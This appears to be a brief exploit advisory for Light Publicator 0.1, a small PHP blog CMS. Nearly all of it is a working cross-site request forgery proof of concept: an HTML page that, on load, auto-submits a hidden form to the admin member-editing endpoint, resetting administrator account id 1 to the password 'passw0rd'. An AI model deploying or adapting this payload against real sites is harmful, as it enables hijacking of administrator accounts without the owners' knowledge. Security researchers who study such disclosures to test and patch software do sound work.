
# Version: 0.1

Introduction
------------

Light publicator is a php based, small blog CMS.

XSRF exploit
------------
[code=html]
<body onload='document.forms[0].submit()'>
<form method='post' action='http://[site]/admin/index.php?module=editmember&id=1'>
	<input type='hidden' name='pseudo' value='admin'>
	<input type='hidden' name='prenom' value='eee'>
	<input type='hidden' name='nom' value=''>
	<input type='hidden' name='genre' value='unknow'>
	<input type='hidden' name='email' value='test@light-publicator.org'>
	<input type='hidden' name='lang' value='1'>
	<input type='hidden' name='style' value='1'>
	<input type='hidden' name='password' value='passw0rd'>
	<input type='hidden' name='password_confirm' value='passw0rd'>
	<input type='hidden' name='edit_adminmember_candidate' value='on'>

</form>
</body>
[/code]
